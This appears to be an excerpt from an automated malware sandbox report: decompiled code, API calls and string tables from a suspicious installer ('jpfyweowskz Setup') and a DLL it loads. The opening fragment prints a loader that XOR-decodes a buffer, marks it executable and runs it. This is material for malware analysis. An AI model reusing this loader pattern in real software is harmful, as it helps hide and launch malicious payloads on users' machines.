                                                                                                						 *0x6edc7f28 = ( *0x6edc7f28 & 0x000000ff) + 0x24;
                                                                                                						 *0x6edc7f28 =  *0x6edc7f28 & 0x000000ff ^  *0x6edc72a0;
                                                                                                						_t76 =  *0x6edc72a0; // 0x12ec
                                                                                                						_t108 =  *0x6edc7f28; // 0x0
                                                                                                						 *((char*)( &E6EDC2000 + _t76)) = _t108;
                                                                                                						continue;
                                                                                                					}
                                                                                                					L3:
                                                                                                					VirtualProtect( &E6EDC2000, 0x12ec, 0x40, 0x6edc7f24);
                                                                                                					E6EDC2000(); // executed
                                                                                                					L4:
                                                                                                					return 0;
                                                                                                					L5:
                                                                                                				}
                                                                                                			}








                                                                                                APIs
                                                                                                • VirtualProtect.KERNELBASE(6EDC2000,000012EC,00000040,6EDC7F24), ref: 6EDAF8E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 79976b1f633c92c105ed0e6b81da70af1546f981dbee7c86d21341ae2588e427
                                                                                                • Instruction ID: f4d3af6bc11f5e3559fb0bb2523c0fd667be671a425c5e0cccfd5d8708494a32
                                                                                                • Opcode Fuzzy Hash: 79976b1f633c92c105ed0e6b81da70af1546f981dbee7c86d21341ae2588e427
                                                                                                • Instruction Fuzzy Hash: 53719F5400DEEABDFB17877B80EC0607FAD5A6FAF2368418AE0D2462C7D55842C7DB25
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA2A3B
                                                                                                • NdrAllocate.RPCRT4(?,00000001), ref: 6EDA2ACC
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2B10
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2B6A
                                                                                                • NdrAllocate.RPCRT4(?,00000001), ref: 6EDA2BFE
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2C42
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2C9C
                                                                                                • NdrAllocate.RPCRT4(?,00000002), ref: 6EDA2D30
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2D74
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2DCE
                                                                                                • NdrAllocate.RPCRT4(?,00000002), ref: 6EDA2E64
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA2EA8
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDA2F02
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA32EC
                                                                                                Strings
                                                                                                • *ppMemory: %p, xrefs: 6EDA2B7D
                                                                                                • *ppMemory: %p, xrefs: 6EDA2DE1
                                                                                                • false, xrefs: 6EDA29ED, 6EDA29F7
                                                                                                • value: 0x%02x, xrefs: 6EDA2BB9
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA2C8A
                                                                                                • invalid range base type: 0x%02x, xrefs: 6EDA32DA
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA2B58
                                                                                                • value exceeded bounds: %u, low: %u, high: %u, xrefs: 6EDA2DBC
                                                                                                • pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s, xrefs: 6EDA2A07
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2D62
                                                                                                • *ppMemory: %p, xrefs: 6EDA2CAF
                                                                                                • *ppMemory: %p, xrefs: 6EDA2F15
                                                                                                • value exceeded bounds: %d, low: %d, high: %d, xrefs: 6EDA2EF0
                                                                                                • invalid format type %x, xrefs: 6EDA2A29
                                                                                                • true, xrefs: 6EDA29E4
                                                                                                • value: 0x%02x, xrefs: 6EDA2CEB
                                                                                                • value: 0x%04x, xrefs: 6EDA2F53
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2E96
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2C30
                                                                                                • value: 0x%04x, xrefs: 6EDA2E1F
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, xrefs: 6EDA2AFE
                                                                                                • base_type = 0x%02x, low_value = %d, high_value = %d, xrefs: 6EDA2A68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                 • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise$Allocate
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$base_type = 0x%02x, low_value = %d, high_value = %d$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$buffer overflow - Buffer = %p, BufferEnd = %p$false$invalid format type %x$invalid range base type: 0x%02x$pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s$true$value exceeded bounds: %d, low: %d, high: %d$value exceeded bounds: %d, low: %d, high: %d$value exceeded bounds: %u, low: %u, high: %u$value exceeded bounds: %u, low: %u, high: %u$value: 0x%02x$value: 0x%02x$value: 0x%04x$value: 0x%04x
                                                                                                • API String ID: 3870461605-2685303744
                                                                                                • Opcode ID: 8872a3e2644a9651149551d300bf2ef1ed691ccf4f6218496aa90d266da21aa2
                                                                                                • Instruction ID: 7c7ccea5a5cf414ba1ab2047e9b42dcb2973ac554e7b284cd1080a582ac029ac
                                                                                                • Opcode Fuzzy Hash: 8872a3e2644a9651149551d300bf2ef1ed691ccf4f6218496aa90d266da21aa2
                                                                                                • Instruction Fuzzy Hash: B5126E74604145EFDB04CF99C490A6ABBB6EF89355F14C188FD898F386D331EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000001), ref: 6EDA78C6
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000002), ref: 6EDA7983
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000004), ref: 6EDA7A40
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000004), ref: 6EDA7AFC
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000008), ref: 6EDA7BC1
                                                                                                • NdrAllocate.RPCRT4(000000B8,00000008), ref: 6EDA7C86
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                 • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                 • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$*ppMemory: %p$Unhandled base type: 0x%02x$false$pStubMsg: %p, ppMemory: %p, type: 0x%02x, fMustAlloc: %s$true$value: %f$value: %f$value: %s$value: 0x%02x$value: 0x%04x$value: 0x%08x
                                                                                                • API String ID: 3846748424-3981477881
                                                                                                • Opcode ID: 6e034e2ae1c0d6661c6c815bbd328f9c9124a7321f16113b06afba8c05a719d6
                                                                                                • Instruction ID: e5e178e8c8e24d4d61dfac229698377480c84f0d168372d1989c542ed3af7984
                                                                                                • Opcode Fuzzy Hash: 6e034e2ae1c0d6661c6c815bbd328f9c9124a7321f16113b06afba8c05a719d6
                                                                                                • Instruction Fuzzy Hash: A1F173B4A00104BFDB44CFA8D880A997779AF85749F10C159FE599F389E731EB50CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                                                				char* _v8;
                                                                                                				signed int _v12;
                                                                                                				void* _v16;
                                                                                                				struct HWND__* _t52;
                                                                                                				intOrPtr _t71;
                                                                                                				intOrPtr _t85;
                                                                                                				long _t86;
                                                                                                				int _t98;
                                                                                                				struct HWND__* _t99;
                                                                                                				signed int _t100;
                                                                                                				intOrPtr _t107;
                                                                                                				intOrPtr _t109;
                                                                                                				int _t110;
                                                                                                				signed int* _t112;
                                                                                                				signed int _t113;
                                                                                                				char* _t114;
                                                                                                				CHAR* _t115;
                                                                                                
                                                                                                				if(_a8 != 0x110) {
                                                                                                					if(_a8 != 0x111) {
                                                                                                						L11:
                                                                                                						if(_a8 != 0x4e) {
                                                                                                							if(_a8 == 0x40b) {
                                                                                                								 *0x429fb8 =  *0x429fb8 + 1;
                                                                                                							}
                                                                                                							L25:
                                                                                                							_t110 = _a16;
                                                                                                							L26:
                                                                                                							return E00403D44(_a8, _a12, _t110);
                                                                                                						}
                                                                                                						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                                                						_t110 = _a16;
                                                                                                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                                                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                                                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                                                							_v12 = _t100;
                                                                                                							_v16 = _t109;
                                                                                                							_v8 = 0x42db00;
                                                                                                							if(_t100 - _t109 < 0x800) {
                                                                                                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                                                								SetCursor(LoadCursorA(0, 0x7f02));
                                                                                                								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                                                								SetCursor(LoadCursorA(0, 0x7f00));
                                                                                                								_t110 = _a16;
                                                                                                							}
                                                                                                						}
                                                                                                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                                                							goto L26;
                                                                                                						} else {
                                                                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                                                								SendMessageA( *0x42eb68, 0x111, 1, 0);
                                                                                                							}
                                                                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                                                								SendMessageA( *0x42eb68, 0x10, 0, 0);
                                                                                                							}
                                                                                                							return 1;
                                                                                                						}
                                                                                                					}
                                                                                                					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
                                                                                                						goto L25;
                                                                                                					} else {
                                                                                                						_t112 =  *0x4297a8 + 0x14;
                                                                                                						if(( *_t112 & 0x00000020) == 0) {
                                                                                                							goto L25;
                                                                                                						}
                                                                                                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                						E004040B0();
                                                                                                						goto L11;
                                                                                                					}
                                                                                                				}
                                                                                                				_t98 = _a16;
                                                                                                				_t113 =  *(_t98 + 0x30);
                                                                                                				if(_t113 < 0) {
                                                                                                					_t107 =  *0x42e33c; // 0x6055b9
                                                                                                					_t113 =  *(_t107 - 4 + _t113 * 4);
                                                                                                				}
                                                                                                				_t71 =  *0x42eb98; // 0x603dec
                                                                                                				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                                                				_t114 = _t113 + _t71;
                                                                                                				_push(0x22);
                                                                                                				_a16 =  *_t114;
                                                                                                				_v12 = _v12 & 0x00000000;
                                                                                                				_t115 = _t114 + 1;
                                                                                                				_v16 = _t115;
                                                                                                				_v8 = E00403DF1;
                                                                                                				E00403CDD(_a4);
                                                                                                				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                                                				_push(0x23);
                                                                                                				E00403CDD(_a4);
                                                                                                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                                                				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                                                				E00403D12(_t99);
                                                                                                				SendMessageA(_t99, 0x45b, 1, 0);
                                                                                                				_t85 =  *0x42eb70; // 0x5ff628
                                                                                                				_t86 =  *(_t85 + 0x68);
                                                                                                				if(_t86 < 0) {
                                                                                                					_t86 = GetSysColor( ~_t86);
                                                                                                				}
                                                                                                				SendMessageA(_t99, 0x443, 0, _t86);
                                                                                                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                                                				 *0x428f9c =  *0x428f9c & 0x00000000;
                                                                                                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                                                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                                                				 *0x429fb8 =  *0x429fb8 & 0x00000000;
                                                                                                				return 0;
                                                                                                			}





















                                                                                                APIs
                                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403EB0
                                                                                                • GetDlgItem.USER32 ref: 00403EC4
                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403EE2
                                                                                                • GetSysColor.USER32(?), ref: 00403EF3
                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403F02
                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403F11
                                                                                                • lstrlenA.KERNEL32(?), ref: 00403F1B
                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403F29
                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403F38
                                                                                                • GetDlgItem.USER32 ref: 00403F9B
                                                                                                • SendMessageA.USER32(00000000), ref: 00403F9E
                                                                                                • GetDlgItem.USER32 ref: 00403FC9
                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404009
                                                                                                • LoadCursorA.USER32 ref: 00404018
                                                                                                • SetCursor.USER32(00000000), ref: 00404021
                                                                                                • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404034
                                                                                                • LoadCursorA.USER32 ref: 00404041
                                                                                                • SetCursor.USER32(00000000), ref: 00404044
                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404070
                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404084
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                • String ID: N$cegrwbhzuj$open$=`
                                                                                                • API String ID: 3615053054-2851761242
                                                                                                • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                                • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                                                                                • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                                • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                				struct tagLOGBRUSH _v16;
                                                                                                				struct tagRECT _v32;
                                                                                                				struct tagPAINTSTRUCT _v96;
                                                                                                				struct HDC__* _t70;
                                                                                                				struct HBRUSH__* _t87;
                                                                                                				struct HFONT__* _t94;
                                                                                                				long _t102;
                                                                                                				intOrPtr _t115;
                                                                                                				signed int _t126;
                                                                                                				struct HDC__* _t128;
                                                                                                				intOrPtr _t130;
                                                                                                
                                                                                                				if(_a8 == 0xf) {
                                                                                                					_t130 =  *0x42eb70; // 0x5ff628
                                                                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                					_a8 = _t70;
                                                                                                					GetClientRect(_a4,  &_v32);
                                                                                                					_t126 = _v32.bottom;
                                                                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                					while(_v32.top < _t126) {
                                                                                                						_a12 = _t126 - _v32.top;
                                                                                                						asm("cdq");
                                                                                                						asm("cdq");
                                                                                                						asm("cdq");
                                                                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                						_t87 = CreateBrushIndirect( &_v16);
                                                                                                						_v32.bottom = _v32.bottom + 4;
                                                                                                						_a16 = _t87;
                                                                                                						FillRect(_a8,  &_v32, _t87);
                                                                                                						DeleteObject(_a16);
                                                                                                						_v32.top = _v32.top + 4;
                                                                                                					}
                                                                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                                                                						_a16 = _t94;
                                                                                                						if(_t94 != 0) {
                                                                                                							_t128 = _a8;
                                                                                                							_v32.left = 0x10;
                                                                                                							_v32.top = 8;
                                                                                                							SetBkMode(_t128, 1);
                                                                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                							_a8 = SelectObject(_t128, _a16);
                                                                                                							DrawTextA(_t128, "jpfyweowskz Setup", 0xffffffff,  &_v32, 0x820);
                                                                                                							SelectObject(_t128, _a8);
                                                                                                							DeleteObject(_a16);
                                                                                                						}
                                                                                                					}
                                                                                                					EndPaint(_a4,  &_v96);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t102 = _a16;
                                                                                                				if(_a8 == 0x46) {
                                                                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                					_t115 =  *0x42eb68; // 0x9023e
                                                                                                					 *((intOrPtr*)(_t102 + 4)) = _t115;
                                                                                                				}
                                                                                                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                                                                			}















                                                                                                APIs
                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                • FillRect.USER32 ref: 004010E4
                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                • DrawTextA.USER32(00000000,jpfyweowskz Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                • String ID: F$jpfyweowskz Setup
                                                                                                • API String ID: 941294808-1867152740
                                                                                                • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                                • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                                                                                • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                                • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (%p,%p,%p,%p,%p,%d)$FC_ALLOCATE_ALL_NODES not implemented$client$deref => %p$free object pointer %p$no unmarshaller for data type=%02x$pointer=%p$pointer_id is 0x%08x$pointer_id is 0x%08x$pointer_id is 0x%08x$server$setting *pPointer to %p$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 0-2416840215
                                                                                                • Opcode ID: b161a4b9c2e8f7a7e5b7c543bc988a5fd5f1b4454f2ca7b5f41f33fdc5cfa5e8
                                                                                                • Instruction ID: eb2b23abd8b1f0c77118c812347e20ee2bc558c24ad6b18a64d323f480f32922
                                                                                                • Opcode Fuzzy Hash: b161a4b9c2e8f7a7e5b7c543bc988a5fd5f1b4454f2ca7b5f41f33fdc5cfa5e8
                                                                                                • Instruction Fuzzy Hash: EFD1CCB190025A9FDB04CF99C891BBEBBB1EF49301F048169E9919B385D338DA51DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d <= %p$double=%f <= %p$enum16=%d <= %p$float=%f <= %p$long=%d <= %p$longlong=%s <= %p$pStubMsg->Buffer after %p$pStubMsg->Buffer before %p$pointer=%p <= %p$short=%d <= %p$unhandled format 0x%02x
                                                                                                • API String ID: 4056999889-2655958773
                                                                                                • Opcode ID: 74b008b2a808d858fc21f6c255152342aa3a79eb7d73902f65ecd6a891f7cd8a
                                                                                                • Instruction ID: c63b5f400f4f4310be93a2cfc853eeec36a04da47c15285c6c0e0f6f7b2f546e
                                                                                                • Opcode Fuzzy Hash: 74b008b2a808d858fc21f6c255152342aa3a79eb7d73902f65ecd6a891f7cd8a
                                                                                                • Instruction Fuzzy Hash: 32D13DB9A00109AFCB04CF98D890EAA7B76EF89354F14C518FE194F345E731EA51CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 17%
                                                                                                			E6EDA9079(void* __eflags) {
                                                                                                				void* _t210;
                                                                                                				void* _t212;
                                                                                                				void* _t214;
                                                                                                
                                                                                                				L0:
                                                                                                				while(1) {
                                                                                                					L0:
                                                                                                					 *(_t210 - 0x24) =  *( *(_t210 + 0xc));
                                                                                                					0x6eda0000("int3264=%ld <= %p\n",  *( *(_t210 + 0xc)),  *(_t210 + 0xc));
                                                                                                					E6EDAB030( *((intOrPtr*)(_t210 + 8)), _t210 - 0x24, 4);
                                                                                                					_t214 = _t212 + 0x18;
                                                                                                					 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[2]);
                                                                                                					while(1) {
                                                                                                						L44:
                                                                                                						 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                						L1:
                                                                                                						while(( *( *(_t210 + 0x10)) & 0x000000ff) != 0x5b) {
                                                                                                							 *(_t210 - 0xc) =  *( *(_t210 + 0x10)) & 0x000000ff;
                                                                                                							 *(_t210 - 0xc) =  *(_t210 - 0xc) - 1;
                                                                                                							if( *(_t210 - 0xc) > 0xb8) {
                                                                                                								L43:
                                                                                                								0x6eda0000("unhandled format 0x%02x\n",  *( *(_t210 + 0x10)) & 0x000000ff);
                                                                                                								_t214 = _t214 + 8;
                                                                                                								while(1) {
                                                                                                									L44:
                                                                                                									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								}
                                                                                                							}
                                                                                                							L3:
                                                                                                							_t16 =  *(_t210 - 0xc) + 0x6eda94a4; // 0xcccccc0e
                                                                                                							switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M6EDA9464))) {
                                                                                                								case 0:
                                                                                                									L4:
                                                                                                									_push( *(_t210 + 0xc));
                                                                                                									_push( *( *(_t210 + 0xc)) & 0x0000ffff);
                                                                                                									_push("byte=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									E6EDAB030( *((intOrPtr*)(_t210 + 8)),  *(_t210 + 0xc), 1);
                                                                                                									_t214 = _t214 + 0x18;
                                                                                                									 *(_t210 + 0xc) =  &(( *(_t210 + 0xc))[0]);
                                                                                                									L44:
                                                                                                									 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                									goto L1;
                                                                                                								case 1:
                                                                                                									L5:
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                                                                                                									_push( *( *(__ebp + 0xc)) & 0x0000ffff);
                                                                                                									_push("short=%d <= %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									 *(__ebp + 8) = E6EDAB030( *(__ebp + 8),  *(__ebp + 0xc), 2);
                                                                                                									__ecx =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp + 0xc) + 2;
                                                                                                									 *(__ebp + 0xc) = __ecx;
                                                                                                									while(1) {
                                                                                                										L44:
